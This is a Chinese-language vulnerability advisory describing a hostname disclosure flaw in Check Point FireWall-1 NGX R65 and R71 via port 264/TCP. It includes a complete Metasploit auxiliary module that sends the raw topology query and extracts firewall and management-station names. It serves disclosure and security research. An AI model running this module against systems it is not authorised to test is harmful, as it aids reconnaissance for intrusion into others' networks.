多个Check Point防火墙产品信息泄露漏洞

发布日期：2012-03-12
更新日期：2012-03-14

受影响系统：
Check Point Software FireWall-1 NGX R71
Check Point Software FireWall-1 NGX R65
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 52430

Check Point软件技术有限公司成立时间于 1993 年，美国总部在加利福尼亚州红木城，是全球首屈一指的 Internet 安全解决方案供应商，在全球企业防火墙、个人防火墙及虚拟专用网络（VPN ）市场上居于领导地位。

Check Point多款端点安全产品在实现上存在信息泄露漏洞，通过发送某些查询到CheckPoint Firewall-1上的端口264/TCP，会显示主机名。攻击者可利用此漏洞获取敏感信息。

<*来源：Patrick Webster （pwebster@ausgeo.com.au）
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Patrick Webster （pwebster@ausgeo.com.au）提供了如下测试方法：

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#  
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
        super(update_info(info,
            'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
            'Description'    => %q{
                This module sends a query to the port 264/TCP on CheckPoint Firewall-1
                firewalls to obtain the firewall name and management station
                (such as SmartCenter) name via a pre-authentication topology request.
                Note that the SecuriTeam reference listed here is not the same vulnerabilty, but it
                does discus the same protocol and is somewhat related to this information
                disclosure.
            },
            'Author'         => [ 'patrick' ],
            'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference
            'References'     =>
                [
                    # patrickw - None? Stumbled across, probably an old bug/feature but unsure.
                    [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], # Advisory coming soon, placeholder
                    [ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related-ish
                ]
        ))

register_options(
            [
                Opt::RPORT(264),
            ], self.class)
    end

def autofilter
        false
    end

def run
        print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
        fw_hostname = nil
        sc_hostname = nil

connect

sock.put("\x51\x00\x00\x00")
        sock.put("\x00\x00\x00\x21")
        res = sock.get_once(4)
        if (res == "Y\x00\x00\x00")
            print_good("Appears to be a CheckPoint Firewall...")
            sock.put("\x00\x00\x00\x0bsecuremote\x00")
            res = sock.get_once
            if (res =~ /CN=(.+),O=(.+)\./i)
                fw_hostname = $1
                sc_hostname = $2
                print_good("Firewall Host: #{fw_hostname}")
                print_good("SmartCenter Host: #{sc_hostname}")
            end
        else
            print_error("Unexpected response: '#{res.inspect}'")
        end

report_info(fw_hostname,sc_hostname)

disconnect
    end